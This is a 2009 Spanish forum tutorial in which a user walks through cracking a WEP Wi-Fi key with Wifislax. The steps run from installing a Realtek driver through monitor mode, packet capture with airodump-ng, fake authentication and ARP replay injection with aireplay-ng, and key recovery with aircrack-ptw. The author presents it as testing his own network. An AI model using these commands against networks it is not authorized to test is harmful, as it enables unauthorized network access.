Seguridad Wireless - Wifi
Suite Seguridad Wireless => Manuales de Wifislax & Wifiway => Mensaje iniciado por: stone_mdq en 03-04-2009, 07:42 (Viernes)
-
Buenas tardes a todos!
Este es mi primer post. Espero salga bien.
Quiero comentarles mi experiencia personal con respecto a las redes wifi y sus famosas claves. Con este post no quiero hacer apología del delito, solo es para los que tal vez quieran probar la seguridad de sus redes o se han olvidado la clave WEP y no quieren resetear el MODEM.
Un día me puse a pensar, siendo usuario de Wifi (por comodidad mas que nada), que no quiero que me roben Internet. Esta muy de moda, "colarse" a las redes sin seguridad de los vecinos y allegados. Y pensé "¿como podían llegar a robarme a mi, si tengo clave!?" Leyendo en foros y videos de you tube, me di cuenta que estaba muy equivocado. Por suerte tengo clave WPA2, la cual es muy segura y casi no se puede averiguar. Pero decidí colocar una clave WEP de 5 caracteres y probar cuanto tardaba en descubrirla (no es muy segura) como hace la mayoría de la gente.
Utilice la ultima versión de Wifislax.
Una vez cargado este sistema operativo Linux, empecé a intentar usar las herramientas para ver que podía hacer. Sin éxito. No detectaba la placa inalámbrica. Me di cuenta que el chip de la placa era un RT8187B y el Wifislax no trae los drivers para esta placa (lo verifiqué utilizando el Everest (http://www.lavalys.com/products.php?ps=UE&lang=en&page=9).
Reinicie la PC, cargue Windows y me puse a investigar arduamente en foros, a ver que conseguía. No tuve mucho éxito, todos los foros decían que esa placa no iba a andar, que era una basura. No había ninguna explicación. Al menos conseguí los drivers de la placa para Linux y decidí que tenía que intentar todo antes de rendirme, aparte quería investigar y me dio mucha bronca que mi placa no fuera compatible (al menos eso dice en los foros). Aquí les dejo los drivers (http://depositfiles.com/files/yjka460ac)
Los pedi directamente a uno de los encargados de software de realtek (lo contacte por mail con mi spanglish, jojo)
Copie los drivers en una particion de mi disco C:/ (gracias a dios Wifislax monta automáticamente todas las unidades que detecta al inicio, aunque sean NTFS),
(http://img24.imageshack.us/img24/8789/perfil1y.jpg)
Mediante Windows busque la MAC ADD de la placa (la obtuve mediante la consola de DOS, colocas ipconfig -all y la anotamos, nos tiene que dar un numero tipo 11:22:3T:44:F5:66, pueden ser letras y números) o sino directamente de las propiedades de la conexion inalambrica
(http://img24.imageshack.us/img24/1582/dibujobtf.jpg)
Reinicie la pc, volví a colocar el LiveCD, inicie nuevamente Wifislax y copie los drivers del disco duro (/mnt/sda1) al directorio ROOT.
(http://img15.imageshack.us/img15/4735/perfil2w.jpg)
Abri una nueva consola y escribí:
(usualmente las consolas están iniciadas en la carpeta root, en donde hemos guardado nuestro archivo)
tar -xvf rtl8187B_linux_26.1052.0225.2009.release.tar.gz (el ultimo es el nombre del archivo, si no lo cambiaron lo dejan así tal cual)
(http://img15.imageshack.us/img15/998/perfil5d.jpg)
cd rtl8187B_linux_26.1052.0225.2009.release (con esto ingresamos al directorio donde están los drivers)
(http://img15.imageshack.us/img15/2412/perfil6.jpg)
make (con este comando instalamos los drivers)
./wlan0up (y ahora "levantamos" nuestra placa)
(http://img15.imageshack.us/img15/1202/perfil7.jpg)
iwconfig (verificamos que ya esta la placa y que todos los parámetros normales)
(http://img27.imageshack.us/img27/5104/perfil10.jpg)
abrimos una nueva consola
airodump-ng wlan0 (con este comando vemos las redes que estan a nuestro alcance, con su respectiva mac (bssid), canal (ch) y nombre (essid)
airmon-ng start wlan0 6 (de esta manera colocamos nuestra placa en modo monitor, para poder monitorear las redes del canal 6 (#CH) Nos tiene que aparecer un mensaje diciendo que ay esta en modo monitor
(http://img27.imageshack.us/img27/1985/perfil13.jpg)
cerramos la consola y abrimos una nueva
airodump-ng –w /mnt/sda3/pass –c1 wlan0 (de esta forma empezamos a monitorear las redes del canal 6 y guardamos los resultados en la carpeta mnt que es donde se montan las unidades. Yo la guardare en sda1 que es la unidad C: de Windows con el nombre de pass)
(http://img9.imageshack.us/img9/6790/perfil211.jpg)
abrimos una nueva consola y ponemos
aireplay-ng -1 30 –e NombreESSID –a MACROUTER –h MACNUESTRA wlan0 (con este comando creamos una asociación entre el router y la pc. Debemos intentar una y otra vez hasta que nos aparezca “association sucefull :-)”
(http://img9.imageshack.us/img9/5958/perfil1p.jpg)
si todo va bien, deberíamos ver algo así
(http://img12.imageshack.us/img12/2103/perfil2.jpg)
abrimos otra consola y colocamos
aireplay-ng -3 –x600 –b MACROUTER –h MACNUESTRA wlan0 (con esto comenzamos a leer y enviar paquetes y recibir ARP y guardarlos)
(http://img12.imageshack.us/img12/8075/perfil3.jpg)
una vez que tenemos una gran cantidad de IV´s (#DATA) (a una gran cantidad me refiero a arriba de 60.000 para claves WEP de 64 bits, o sea 5 caracteres ASCII, o arriba de 150.000 para contraseñas WEP de 128 bits o sea 13 caracteres ASCII)
(http://img12.imageshack.us/img12/3600/perfil4.jpg)
abrimos una nueva consola y utilizaremos el siguiente comando
aircrack-ptw /mnt/sda3/pass-01.cap (aquí es donde habíamos generado el archivo. Ingresamos al directorio y nos fijamos cual de los archivos es el mas grande (en tamaño kb) y lo usaremos para averiguar la clave WEP en tan solo unos segundos, en este caso el mas grande era el pass-01.cap)
(http://img15.imageshack.us/img15/9413/perfil5.jpg)
Por arte de magia (y algoritmos que ningún mago puede explicar) en tan solo un segundo obtuve la clave WEP en caracteres hexadecimales y ASCII. Pero estuve “conectado” unos 15 minutos.
También pueden obtenerla mediante
aircrack-ng /mnt/sda3/pass-01.cap (tarda unos segundos mas) yo lo probé con los dos y dio el mismo resultado
(http://img6.imageshack.us/img6/107/perfil11.jpg)
y configuramos la conexión
iwconfig wlan0 mode managed essid NOMBREDESSID key CLAVEWEP
ahora obtenemos una dirección IP (esto demora unos segundos)
dhcpcd wlan0
probamos un ping al router
(http://img14.imageshack.us/img14/8836/perfil13r.jpg)
y podemos probar nuestra conexión con un ping a Google por ejemplo
ping www.google.com
(http://img14.imageshack.us/img14/7639/perfil14.jpg)
y ya estamos conectados!
Si no nos agrada navegar por Linux, reiniciamos la PC y cuando vamos a conectaros a la red y nos pida la clave, colocamos la que nos dio el aircrack y listoooo!
Probe introducir una clave WEP de 128 bits (o sea 13 caracteres ASCII) y en 20 minutos la obtuve, de la misma manera que la anterior. Espero les sirva para poder probar la seguridad de sus redes.
En mi casa tengo puesta clave WPA2 y aun no la he podido descifrar con Wifislax, por lo que me parece lo mas seguro del momento.
Gracias a toda la gente del foro que han podido ayudar en mis tantas dudas.
Saludos a todos... ;)
http://www.gigasize.com/get.php?d=qvgmsor46kb